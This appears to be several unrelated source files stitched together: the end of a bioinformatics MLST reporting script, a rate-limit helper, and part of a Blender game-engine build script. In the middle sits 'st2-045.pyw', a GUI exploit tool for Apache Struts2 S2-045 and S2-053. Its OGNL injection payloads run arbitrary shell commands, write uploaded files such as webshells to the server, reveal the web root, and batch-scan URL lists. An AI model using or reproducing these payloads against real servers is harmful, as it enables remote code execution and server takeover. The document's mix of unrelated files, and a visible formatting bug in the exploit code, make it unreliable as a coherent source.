                                        resultString += "%s," % allele
                                    # Otherwise add the percent identity following the allele
                                    else:
                                        resultString += "%s (%s%%)," % (allele, resultProfile[genome][sequenceType][numMatches][gene][allele])
                        # Append the resultString to the report
                        csvfile.write(resultString)
                # If there is more than one identical profile
                else:
                    # Same as above, but only add the genome on the first line
                    for sequenceType in resultProfile[genome]:
                        # First sequence type
                        if resProfileCount == 0:
                            resultString += "%s,%s, " % (genome, sequenceType)
                            for numMatches in resultProfile[genome][sequenceType]:
                                resultString += "%s," % numMatches
                                for gene in geneList:
                                    for allele in resultProfile[genome][sequenceType][numMatches][gene]:
                                        if float(resultProfile[genome][sequenceType][numMatches][gene][allele]) == 100 \
                                                or float(resultProfile[genome][sequenceType][numMatches][gene][allele]) == 0:
                                            resultString += "%s," % allele
                                        else:
                                            resultString += "%s (%s%%)," % (allele, resultProfile[genome][sequenceType][numMatches][gene][allele])
                            resProfileCount += 1
                            csvfile.write(resultString)
                        # Subsequent sequence types: blank genome column
                        else:
                            resultString = "\n,"
                            resultString += "%s," % sequenceType
                            for numMatches in resultProfile[genome][sequenceType]:
                                resultString += "%s," % numMatches
                                for gene in geneList:
                                    for allele in resultProfile[genome][sequenceType][numMatches][gene]:
                                        if float(resultProfile[genome][sequenceType][numMatches][gene][allele]) == 100 \
                                                or float(resultProfile[genome][sequenceType][numMatches][gene][allele]) == 0:
                                            resultString += "%s," % allele
                                        else:
                                            resultString += "%s (%s%%)," % (allele, resultProfile[genome][sequenceType][numMatches][gene][allele])
                            resProfileCount += 1
                            csvfile.write(resultString)
            # The option to not update the profiles is optionally available, so do the same as
            # above, but for genomes that lack a perfect match to a reference profile.
            # This is essentially identical to the code above; ideally it should be
            # factored into a reusable function.
            else:
                if len(MLSTseqType[genome]) == 1:
                    for sequenceType in MLSTseqType[genome]:
                        resultString += "%s,%s," % (genome, sequenceType)
                        for numMatches in MLSTseqType[genome][sequenceType]:
                            resultString += "%s," % numMatches
                            for gene in geneList:
                                for allele in MLSTseqType[genome][sequenceType][numMatches][gene]:
                                    for refAllele in MLSTseqType[genome][sequenceType][numMatches][gene][allele]:
                                        if allele == refAllele:
                                            if float(MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele]) == 100 \
                                                    or float(MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele]) == 0:
                                                resultString += "%s," % allele
                                            else:
                                                resultString += "%s (%s%%)," % (allele, MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele])
                                        # Since there are mismatches, show the expected allele in the reference profile
                                        else:
                                            resultString += "%s (%s - %s%%)," % (allele, refAllele, MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele])
                        csvfile.write(resultString)
                else:
                    for sequenceType in MLSTseqType[genome]:
                        if sequenceTypeCount == 0:
                            resultString += "%s,%s," % (genome, sequenceType)
                            for numMatches in MLSTseqType[genome][sequenceType]:
                                resultString += "%s," % numMatches
                                for gene in geneList:
                                    for allele in MLSTseqType[genome][sequenceType][numMatches][gene]:
                                        for refAllele in MLSTseqType[genome][sequenceType][numMatches][gene][allele]:
                                            if allele == refAllele:
                                                if float(MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele]) == 100 \
                                                        or float(MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele]) == 0:
                                                    resultString += "%s," % allele
                                                else:
                                                    resultString += "%s (%s%%)," % (allele, MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele])
                                            else:
                                                resultString += "%s (%s - %s%%)," % (allele, refAllele, MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele])
                            sequenceTypeCount += 1
                            csvfile.write(resultString)
                        else:
                            resultString = "\n,"
                            resultString += "%s," % sequenceType
                            for numMatches in MLSTseqType[genome][sequenceType]:
                                resultString += "%s," % numMatches
                                for gene in geneList:
                                    for allele in MLSTseqType[genome][sequenceType][numMatches][gene]:
                                        for refAllele in MLSTseqType[genome][sequenceType][numMatches][gene][allele]:
                                            if allele == refAllele:
                                                if float(MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele]) == 100 \
                                                        or float(MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele]) == 0:
                                                    resultString += "%s," % allele
                                                else:
                                                    resultString += "%s (%s%%)," % (allele, MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele])
                                            else:
                                                resultString += "%s (%s - %s%%)," % (allele, refAllele, MLSTseqType[genome][sequenceType][numMatches][gene][allele][refAllele])
                            sequenceTypeCount += 1
                            csvfile.write(resultString)
    # File cleanup: remove the per-run XML results from the tmp folder
    tmpFiles = glob("%stmp/*" % path)
    for tmpFile in tmpFiles:
        try:
            os.remove(tmpFile)
        except OSError:
            raise
    # Calculate the elapsed time
    end = time.time() - start
    # Friendly exit statement
    print "\n[%s] Elapsed time for GeneSeeking is %.2f seconds with %.2f seconds per genome" \
        % (time.strftime("%H:%M:%S"), end, end/float(len(strains)))
# Script entry point: run the full MLST analysis using the module-level option
# variables (path, cutoff, sequencePath, allelePath, organismPath, scheme,
# organism) that are populated earlier in the file.
blaster(path, cutoff, sequencePath, allelePath, organismPath, scheme, organism)
st2-045.pyw | # -*- coding: utf-8 -*-
from ui import Ui_MainWindow,_translate,_fromUtf8
from PyQt4 import QtCore, QtGui
import requests
import sys,threading
class Ognl(object):
dm = "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
mb = "(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
md = "(#c='{cmd}').(#i=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#md=(#i?{'cmd.exe','/c',#c}:{'/bin/bash','-c',#c}))"
ps = "(#ps=new java.lang.ProcessBuilder(#md))(#ps.redirectErrorStream(true)).(#pr=#ps.start()).(#rs=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#pr.getInputStream(),#rs)).(#rs.flush())"
fw = "(#fw=new java.io.FileWriter(new java.io.File(new java.lang.StringBuilder('{path}')))).(#fw.write('{content}')).(#fw.flush()).(#fw.close())"
rs = "(#rs=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#rs)).(#rs.flush())"
def __init__(self,base=''):
self.base = base
self.payload = []
def make(self,it='.'):
return self.filter(it.join(self.payload))
@classmethod
def filter(self,s):
return s
class StrutsBase(object):
method = "STRUTS"
req = requests.Session()
proxies = {}
auth = ()
timeout = 60
url = None
webpath = None
headers = {
'Cookie' : 'STRUTS-Cookie',
'User-Agent': 'STRUTS-Ua',
'Accept' : 'text/html',
'Connection': 'close'
}
def __init__(self):
self.data = {}
def set_data(self,k,v):
self.data[k] = v
@classmethod
def set_header(self,k,v):
self.headers[k] = v
def send(self,url=None,data=None,headers=None,ref=True):
if ref:self.headers['Referer'] = url
return self.req.post(
url = url if url else self.url,
data = data if data else self.data,
headers = headers if headers else self.headers,
proxies = self.proxies,
auth = self.auth,
timeout = self.timeout,
verify=False)
def poc(self,url=None):
return
def exp(self,cmd):
return 'exp'
def upload(self,path,content='testst2',encoding='UTF-8'):
return
def getpath(self):
return 'getpath'
class Struts2045(StrutsBase):
def poc(self,url=None):
payload = ("%{(#nike='multipart/form-data')"
".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
".(#r=@org.apache.struts2.ServletActionContext@getResponse().getWriter())"
".(#r.println('STRUTStest'+20+45))"
".(#r.close())}")
self.set_header('Content-Type',payload)
res = self.send(url=url).text
return 'STRUTStest2045' in res
def exp(self,cmd):
payload = ("%{(#nike='multipart/form-data')"
".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
".(#c='"+cmd+"')"
".(#i=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))"
".(#s=(#i?{'cmd.exe','/c',#c}:{'/bin/bash','-c',#c}))"
".(#p=new java.lang.ProcessBuilder(#s))"
".(#p.redirectErrorStream(true)).(#process=#p.start())"
".(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))"
".(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r))"
".(#r.flush())}")
self.set_header('Content-Type',payload)
return self.send().text
def exp1(self,cmd):
payload = ("%{(#nike='multipart/form-data')"
".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])"
".(#o=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))"
".(#o.getExcludedPackageNames().clear())"
".(#o.getExcludedClasses().clear())"
".(#context.setMemberAccess(#dm))))"
".(#cmd='"+cmd+"')"
".(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))"
".(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))"
".(#p=new java.lang.ProcessBuilder(#cmds))"
".(#p.redirectErrorStream(true)).(#process=#p.start())"
".(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))"
".(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r))"
".(#r.flush())}")
self.set_header('Content-Type',payload)
return self.send().text
def upload(self,path,content,encoding='UTF-8'):
payload = ("%{(#nike='multipart/form-data')"
".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
".(#w=@org.apache.struts2.ServletActionContext@getResponse().getWriter())"
".(#f=new java.io.FileWriter(new java.io.File(new java.lang.StringBuilder('"+path+"'))))"
".(#f.write('"+content+"'))"
".(#f.flush())"
".(#f.close())"
".(#w.print('STRUTStest'+20+45)"
".(#w.close()))}")
self.set_header('Content-Type',payload)
res = self.send().text
return 'STRUTStest2045' in res
def upload1(self,path,content,encoding='UTF-8'):
payload = ("%{(#nike='multipart/form-data')"
".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])"
".(#o=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))"
".(#o.getExcludedPackageNames().clear())"
".(#o.getExcludedClasses().clear())"
".(#context.setMemberAccess(#dm))))"
".(#w=@org.apache.struts2.ServletActionContext@getResponse().getWriter())"
".(#f=new java.io.FileWriter(new java.io.File(new java.lang.StringBuilder('"+path+"'))))"
".(#f.write('"+content+"'))"
".(#f.flush())"
".(#f.close())"
".(#w.print('STRUTStest'+20+45)"
".(#w.close()))}")
self.set_header('Content-Type',payload)
res = self.send().text
return 'STRUTStest2045' in res
def getpath(self):
payload = ("%{(#nike='multipart/form-data')"
".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
".(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter())"
".(#r=@org.apache.struts2.ServletActionContext@getRequest().getRealPath('/'))"
".(#o.println(#r))"
".(#o.close())}")
self.set_header('Content-Type',payload)
res = self.send().text
return res.strip()
class Struts2053(StrutsBase):
"""%25{(%23dm=@ogn1.OgnIContext@DEFAULT_MEMBER_ACCESS).(%23_memberAccess?(%23_memberAccess=%23dm):((%23container=%23context ['com.opensymphony.xwork2.ActionContext.container'])(%23ogn1util=%23container.getInstance(@com.opensymphony.xwork2.ogn1.ognlUtil@class) ).(%23ogn1Util.getExcludedPackageNames().clear()).(%23ogn1Util.getExcludedClasses( ).clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd='whoami').(%23cmds={'cmd.exe','/c',%23cmd}).(%23p=new java.lang.ProcessBuilder(%23cmds))(%23p.redirectErrorStream(true)).(%23process=%23p.start()).(%23ins=%23process.getInputStream()).(@org.apache.commons.io.IOUtils@toString(%23ins,'UTF-8'))}"""
def poc(self,url=None):
payload = ("%{987654321-1234567}")
url = "?redirectUri=%s"%(url,payload)
res = self.send(url=url).text
return '986419754' in res
def exp(self,cmd):
payload = ("%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
".(#c='"+cmd+"')"
".(#i=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))"
".(#s=(#i?{'cmd.exe','/c',#c}:{'/bin/bash','-c',#c}))"
".(#p=new java.lang.ProcessBuilder(#s))"
".(#p.redirectErrorStream(true)).(#process=#p.start())"
".(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))"
".(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r))"
".(#r.flush())}").replace('%','%25').replace('#','%23')
url = "?redirectUri=%s"%(url,payload)
res = self.send(url=url).text
return 'STRUTStest2053' in res
def upload(self,path,content,encoding='UTF-8'):
payload = ("%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
".(#w=@org.apache.struts2.ServletActionContext@getResponse().getWriter())"
".(#f=new java.io.FileWriter(new java.io.File(new java.lang.StringBuilder('"+path+"'))))"
".(#f.write('"+content+"'))"
".(#f.flush())"
".(#f.close())"
".(#w.print('STRUTStest'+20+53)"
".(#w.close()))}").replace('%','%25').replace('#','%23')
url = "?=redirectUri=%s"%(url,payload)
res = self.send(url=url).text
return 'STRUTStest2053' in res
def getpath(self):
payload = ("%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
".(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm))))"
".(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter())"
".(#r=@org.apache.struts2.ServletActionContext@getRequest().getRealPath('/'))"
".(#o.println(#r))"
".(#o.close())}").replace('%','%25').replace('#','%23')
url = "?redirectUri=%s"%(url,payload)
res = self.send(url=url).text
return 'STRUTStest2053' in res
class QIterThread(QtCore.QThread):
def __init__(self):
QtCore.QThread.__init__(self)
self.Queue = []
self.threads = 10
self.timeout = 10
self.__FLAG = True #stop
self.__STAT = False #pause
def run(self):
if self.Queue and self.handler:
self.__FLAG = True
self.__STAT = False
Qiter = iter(self.Queue)
while self.__FLAG:
__ = []
if self.__STAT:
self.sleep(1)
continue
for _ in range(self.threads):
try:
data = next(Qiter)
except StopIteration:
self.__FLAG = False
break
_Q = threading.Thread(target=self.handler,args=(data,))
__.append(_Q)
for _ in __:
_.start()
def stop(self):
self.__FLAG = False
self.__STAT = False
def pause(self):
self.__STAT = not self.__STAT
def setup(self,**kwargs):
for k,v in kwargs.items():
setattr(self,k,v)
class EventHandler(QtGui.QMainWindow,Ui_MainWindow):
@QtCore.pyqtSlot(str)
def on_lineEdit_url_textChanged(self,event):
if not str(event).startswith(('http','HTTP')):
event='http://%s'%event
StrutsBase.url = event
self.updatestatus(u'更改URL地址为%s'%event)
@QtCore.pyqtSlot(bool)
def on_pushButton_info_clicked(self,event):
if StrutsBase.url:
self.text_info.setText('')
for name,mod in self.mods.items():
self.updatestatus(u'正在测试是否存在%s漏洞。'%name)
if mod.poc():
self.curmod = mod
self.text_info.insertPlainText(u'发现%s漏洞!!!系统确定为%s漏洞模式.!\n'%(name,name))
else:
self.text_info.insertPlainText(u'未发现%s漏洞\n'%name)
self.updatestatus(u'')
@QtCore.pyqtSlot(bool)
def on_pushButton_cmd_clicked(self,event):
if self.curmod:
self.text_cmd.setText(self.curmod.exp(self.lineEdit_cmd.text()))
else:
self.updatestatus(u'请先确定使用的漏洞模式')
@QtCore.pyqtSlot(bool)
def on_pushButton_allload_clicked(self,event):
folder = QtGui.QFileDialog.getOpenFileName(None,u"选择导入的地址文件",'',"*.*")
if folder:
self.treeWidget.clear()
inFile = QtCore.QFile(folder)
if inFile.open(QtCore.QIODevice.ReadOnly):
stream = QtCore.QTextStream(inFile)
i = 1
while not stream.atEnd():
line = stream.readLine()
item = QtGui.QTreeWidgetItem()
item.setText(0,str(i))
item.setText(1,_fromUtf8(line))
item.setText(2,_fromUtf8(u'待验证'))
self.treeWidget.addTopLevelItem(item)
i += 1
self.lineEdit_all.setText(folder)
self.updatestatus(u'文件导入成功')
@QtCore.pyqtSlot(bool)
def on_pushButton_alltest_clicked(self,event):
item = QtGui.QTreeWidgetItemIterator(self.treeWidget)
items = []
while item.value():
items.append(item.value())
item = item.__iadd__(1)
#多线程
self.allverify.setup(Queue = items,handler=self.allverify_event)
self.allverify.start()
self.updatestatus(u'开始批量验证')
@QtCore.pyqtSlot(bool)
def on_pushButton_allstop_clicked(self,event):
self.allverify.stop()
self.updatestatus(u'停止批量验证')
@QtCore.pyqtSlot(bool)
def on_pushButton_allexport_clicked(self,event):
item = QtGui.QTreeWidgetItemIterator(self.treeWidget)
csv = []
while item.value():
csv.append(','.join([item.value().text(0),item.value().text(1),item.value().text(2)]))
item = item.__iadd__(1)
filename = QtGui.QFileDialog.getSaveFileName(None,u"保存文件",'',"*.csv")
if filename:
with open(filename,'w') as f:
f.write('\n'.join(csv))
f.close()
self.updatestatus(u'文件导出成功。%s'%filename)
@QtCore.pyqtSlot(QtGui.QTreeWidgetItem,int)
def on_treeWidget_itemDoubleClicked(self,item,i):
url = str(item.text(1)).strip()
self.lineEdit_url.setText(url)
StrutsBase.url = url
self.updatestatus(u'选择URL地址%s'%url)
@QtCore.pyqtSlot(bool)
def on_pushButton_getpath_clicked(self,event):
if self.curmod:
self.lineEdit_upload.setText(self.curmod.getpath())
else:
self.updatestatus(u'请先确定使用的漏洞模式')
@QtCore.pyqtSlot(bool)
def on_pushButton_upload_clicked(self,event):
if self.curmod:
path = self.lineEdit_upload.text()
path = str(path).strip().replace('\\','/')
content = self.text_upload.toPlainText()
if self.curmod.upload(path,content):
self.updatestatus(u'上传成功')
else:
self.updatestatus(u'上传失败')
else:
self.updatestatus(u'请先确定使用的漏洞模式')
@QtCore.pyqtSlot(str)
def on_comboBox_mod_activated(self,event):
if event in self.mods.keys():
self.curmod = self.mods[str(event)]
self.updatestatus(u'手动切换为%s漏洞模式'%event)
@QtCore.pyqtSlot(str)
def on_lineEdit_proxyhost_textChanged(self,event):
host = self.lineEdit_proxyhost.text()
port = self.lineEdit_proxyport.text()
StrutsBase.proxies = {'http':'http://%s:%s'%(host,port),'https':'http://%s:%s'%(host,port)}
self.updatestatus(u'更改代理地址为%s'%event)
@QtCore.pyqtSlot(str)
def on_lineEdit_proxyport_textChanged(self,event):
host = self.lineEdit_proxyhost.text()
port = self.lineEdit_proxyport.text()
StrutsBase.proxies = {'http':'http://%s:%s'%(host,port),'https':'http://%s:%s'%(host,port)}
self.updatestatus(u'更改代理端口为%s'%event)
@QtCore.pyqtSlot(str)
def on_lineEdit_authname_textChanged(self,event):
name = self.lineEdit_authname.text()
pwd = self.lineEdit_authpwd.text()
StrutsBase.auth = (name,pwd)
self.updatestatus(u'更改认证用户为%s'%event)
@QtCore.pyqtSlot(str)
def on_lineEdit_authpwd_textChanged(self,event):
name = self.lineEdit_authname.text()
pwd = self.lineEdit_authpwd.text()
StrutsBase.auth = (name,pwd)
self.updatestatus(u'更改认证密码为%s'%event)
@QtCore.pyqtSlot()
def on_plainTextEdit_cookie_textChanged(self):
event = self.plainTextEdit_cookie.toPlainText()
StrutsBase.set_header('Cookie',event)
self.updatestatus(u'更改COOKIE为%s'%event)
@QtCore.pyqtSlot(str)
def on_lineEdit_ua_textChanged(self,event):
StrutsBase.set_header('User-Agent',event)
self.updatestatus(u'更改UA头为%s'%event)
@QtCore.pyqtSlot(int)
def on_spinBox_threads_valueChanged(self,event):
self.allverify.setup(threads=event)
self.updatestatus(u'更改线程数为%s'%event)
class GuiMain(EventHandler):
signal_status = QtCore.pyqtSignal(str)
def __init__(self):
super(EventHandler, self).__init__()
self.setupUi(self)
self.treeWidget.header().setResizeMode(QtGui.QHeaderView.ResizeToContents)
#禁止最大化
self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)
#禁止拉伸窗口
self.setFixedSize(self.width(), self.height())
self.signal_status.connect(self.updatestatus)
self.mods = {}
self.curmod = None
for i,mod in enumerate(StrutsBase.__subclasses__()):
self.mods[mod.__name__] = mod()
self.comboBox_mod.addItem(_fromUtf8(mod.__name__))
self.allverify = QIterThread()
#QtCore.QMetaObject.connectSlotsByName(self)
def updatestatus(self,msg):
self.statusBar.showMessage(msg)
def allverify_event(self,item):
try:
url = item.text(1)
item.setText(2,_fromUtf8(u'未发现漏洞'))
for name,mod in self.mods.items():
if mod.poc(url=str(url).strip()):
item.setText(2,'%s'%name)
item.setBackgroundColor(0,QtGui.QColor("#ff0000"))
item.setBackgroundColor(1,QtGui.QColor("#ff0000"))
item.setBackgroundColor(2,QtGui.QColor("#ff0000"))
except Exception as e:
self.updatestatus(str(e))
def main():
app = QtGui.QApplication(sys.argv)
mainWindow = GuiMain()
mainWindow.show()
sys.exit(app.exec_())
main() |
message.py | import queue
import threading
import time
# Users currently on cooldown, oldest first (popped from index 0 on expiry).
rateLimit = []
# FIFO of (user, expiry_unix_timestamp) pairs consumed by deleteLimit().
rateLimitQueue = queue.Queue()
def cooldown_add(user, cooldown_amount=3600):
    """Place *user* on cooldown for *cooldown_amount* seconds (default 1h).

    Records the expiry in rateLimitQueue for the background expiry worker
    and appends the user to the rateLimit list.
    """
    expiry = time.time() + cooldown_amount
    rateLimitQueue.put((user, expiry))
    rateLimit.append(user)
def deleteLimit():
    """Background worker that expires rate-limit entries in FIFO order.

    Pops (user, expiry) pairs off rateLimitQueue, sleeps until each
    entry's expiry timestamp has passed, then removes the oldest user
    from rateLimit. Loops forever; intended to run in a dedicated thread.
    """
    while True:
        # BUG FIX: the original wrote `rateLimitQueue.empty == True`,
        # comparing the bound method object to True (always False), so the
        # idle branch was unreachable and the code fell through to a
        # blocking get(). Call the method so the check actually works.
        if rateLimitQueue.empty():
            time.sleep(1)
        else:
            user, expires = rateLimitQueue.get()
            current = round(time.time())
            if current >= expires:
                # Already expired while queued; drop the oldest user now.
                rateLimit.pop(0)
            else:
                # Sleep out the remaining cooldown, then drop it.
                time.sleep(expires - current)
                rateLimit.pop(0)
# Launch the expiry worker at import time.
# NOTE(review): not a daemon thread, so it keeps the interpreter alive on
# shutdown — confirm that is intended.
rateLimitThread = threading.Thread(target=deleteLimit)
rateLimitThread.start()
make.py | import os
import glob
import time
import shutil
import bpy
import json
import stat
from bpy.props import *
import subprocess
import threading
import webbrowser
import arm.utils
import arm.write_data as write_data
import arm.make_logic as make_logic
import arm.make_renderpath as make_renderpath
import arm.make_world as make_world
import arm.make_state as state
import arm.assets as assets
import arm.log as log
import arm.lib.make_datas
import arm.lib.server
from arm.exporter import ArmoryExporter
# Shared exporter instance reused by every build/patch invocation.
exporter = ArmoryExporter()
scripts_mtime = 0 # Monitor source changes
profile_time = 0  # Wall-clock start of the current build, set in build()
def run_proc(cmd, done):
    """Spawn *cmd* as a subprocess and return its Popen handle immediately.

    A background thread waits for the process to exit and then invokes the
    *done* callback (if not None), so the caller is never blocked.
    """
    def _wait_then_notify(proc, callback):
        # Runs on the watcher thread: block until exit, then notify.
        proc.wait()
        if callback is not None:
            callback()
    proc = subprocess.Popen(cmd)
    threading.Thread(target=_wait_then_notify, args=(proc, done)).start()
    return proc
def compile_shader_pass(res, raw_shaders_path, shader_name, defs, make_variants):
    """Compile one named shader pass into the build's compiled/Shaders dir.

    Reads <shader_name>.json from the raw shaders tree, lets
    arm.lib.make_datas generate shader datas into *res* (mutated in place),
    then copies each referenced GLSL stage file next to them.
    NOTE(review): changes the process CWD and does not restore it — callers
    appear to rely on a later os.chdir (see export_data).
    """
    os.chdir(raw_shaders_path + '/' + shader_name)
    # Open json file
    json_name = shader_name + '.json'
    with open(json_name) as f:
        json_file = f.read()
    json_data = json.loads(json_file)
    fp = arm.utils.get_fp_build()
    arm.lib.make_datas.make(res, shader_name, json_data, fp, defs, make_variants)
    path = fp + '/compiled/Shaders'
    # Copy every shader stage referenced by the first context.
    c = json_data['contexts'][0]
    for s in ['vertex_shader', 'fragment_shader', 'geometry_shader', 'tesscontrol_shader', 'tesseval_shader']:
        if s in c:
            shutil.copy(c[s], path + '/' + c[s].split('/')[-1])
def remove_readonly(func, path, excinfo):
    """Error handler for ``shutil.rmtree``.

    Clears the read-only attribute on *path*, then retries the failed
    operation *func* (e.g. ``os.remove`` / ``os.rmdir``).
    """
    os.chmod(path, stat.S_IWRITE)
    func(path)
def export_data(fp, sdk_path):
    """Export all project data into the build directory.

    Builds logic/world/renderpath node trees, serializes every scene marked
    arm_export, compiles referenced shader passes, and writes khafile.js,
    Main.hx and (optionally) config.arm.

    fp -- project root path. sdk_path -- Armory SDK root path.
    """
    global exporter
    wrd = bpy.data.worlds['Arm']
    print('\nArmory v{0} ({1})'.format(wrd.arm_version, wrd.arm_commit))
    print('OS: ' + arm.utils.get_os() + ', Target: ' + state.target + ', GAPI: ' + arm.utils.get_gapi() + ', Blender: ' + bpy.app.version_string)
    # Clean compiled variants if cache is disabled
    build_dir = arm.utils.get_fp_build()
    if wrd.arm_cache_build == False:
        if os.path.isdir(build_dir + '/debug/html5-resources'):
            shutil.rmtree(build_dir + '/debug/html5-resources', onerror=remove_readonly)
        if os.path.isdir(build_dir + '/krom-resources'):
            shutil.rmtree(build_dir + '/krom-resources', onerror=remove_readonly)
        if os.path.isdir(build_dir + '/debug/krom-resources'):
            shutil.rmtree(build_dir + '/debug/krom-resources', onerror=remove_readonly)
        if os.path.isdir(build_dir + '/windows-resources'):
            shutil.rmtree(build_dir + '/windows-resources', onerror=remove_readonly)
        if os.path.isdir(build_dir + '/linux-resources'):
            shutil.rmtree(build_dir + '/linux-resources', onerror=remove_readonly)
        if os.path.isdir(build_dir + '/osx-resources'):
            shutil.rmtree(build_dir + '/osx-resources', onerror=remove_readonly)
        if os.path.isdir(build_dir + '/compiled/Shaders'):
            shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
    raw_shaders_path = sdk_path + '/armory/Shaders/'
    assets_path = sdk_path + '/armory/Assets/'
    export_physics = bpy.data.worlds['Arm'].arm_physics != 'Disabled'
    export_navigation = bpy.data.worlds['Arm'].arm_navigation != 'Disabled'
    export_ui = bpy.data.worlds['Arm'].arm_ui != 'Disabled'
    assets.reset()
    # Build node trees
    ArmoryExporter.import_traits = []
    make_logic.build()
    make_world.build()
    make_renderpath.build()
    # Export scene data
    assets.embedded_data = sorted(list(set(assets.embedded_data)))
    physics_found = False
    navigation_found = False
    ui_found = False
    ArmoryExporter.compress_enabled = state.is_publish and wrd.arm_asset_compression
    ArmoryExporter.optimize_enabled = state.is_publish and wrd.arm_optimize_data
    if not os.path.exists(build_dir + '/compiled/Assets'):
        os.makedirs(build_dir + '/compiled/Assets')
    for scene in bpy.data.scenes:
        if scene.arm_export:
            ext = '.lz4' if ArmoryExporter.compress_enabled else '.arm'
            asset_path = build_dir + '/compiled/Assets/' + arm.utils.safestr(scene.name) + ext
            exporter.execute(bpy.context, asset_path, scene=scene)
            if ArmoryExporter.export_physics:
                physics_found = True
            if ArmoryExporter.export_navigation:
                navigation_found = True
            if ArmoryExporter.export_ui:
                ui_found = True
            assets.add(asset_path)
    if physics_found == False: # Disable physics if no rigid body is exported
        export_physics = False
    if navigation_found == False:
        export_navigation = False
    if ui_found == False:
        export_ui = False
    if wrd.arm_ui == 'Enabled':
        export_ui = True
    modules = []
    if wrd.arm_audio == 'Enabled':
        modules.append('audio')
    if export_physics:
        modules.append('physics')
    if export_navigation:
        modules.append('navigation')
    if export_ui:
        modules.append('ui')
    if wrd.arm_formatlib == 'Enabled':
        modules.append('format')
    print('Exported modules: ' + str(modules))
    defs = arm.utils.def_strings_to_array(wrd.world_defs)
    cdefs = arm.utils.def_strings_to_array(wrd.compo_defs)
    print('Shader flags: ' + str(defs))
    if wrd.arm_debug_console:
        print('Khafile flags: ' + str(assets.khafile_defs))
    # Render path is configurable at runtime
    has_config = wrd.arm_write_config or os.path.exists(arm.utils.get_fp() + '/Bundled/config.arm')
    # Write compiled.inc
    shaders_path = build_dir + '/compiled/Shaders'
    if not os.path.exists(shaders_path):
        os.makedirs(shaders_path)
    write_data.write_compiledglsl(defs + cdefs, make_variants=has_config)
    # Write referenced shader passes (only when cache is missing or the
    # world defs changed since the last build)
    if not os.path.isfile(build_dir + '/compiled/Shaders/shader_datas.arm') or state.last_world_defs != wrd.world_defs:
        res = {}
        res['shader_datas'] = []
        for ref in assets.shader_passes:
            # Ensure shader pass source exists
            if not os.path.exists(raw_shaders_path + '/' + ref):
                continue
            assets.shader_passes_assets[ref] = []
            if ref.startswith('compositor_pass'):
                compile_shader_pass(res, raw_shaders_path, ref, defs + cdefs, make_variants=has_config)
            else:
                compile_shader_pass(res, raw_shaders_path, ref, defs, make_variants=has_config)
        arm.utils.write_arm(shaders_path + '/shader_datas.arm', res)
        for ref in assets.shader_passes:
            for s in assets.shader_passes_assets[ref]:
                assets.add_shader(shaders_path + '/' + s + '.glsl')
        for file in assets.shaders_external:
            name = file.split('/')[-1].split('\\')[-1]
            target = build_dir + '/compiled/Shaders/' + name
            if not os.path.exists(target):
                shutil.copy(file, target)
        state.last_world_defs = wrd.world_defs
    # Reset path (compile_shader_pass chdirs into the shader tree)
    os.chdir(fp)
    # Copy std shaders
    if not os.path.isdir(build_dir + '/compiled/Shaders/std'):
        shutil.copytree(raw_shaders_path + 'std', build_dir + '/compiled/Shaders/std')
    # Write config.arm
    resx, resy = arm.utils.get_render_resolution(arm.utils.get_active_scene())
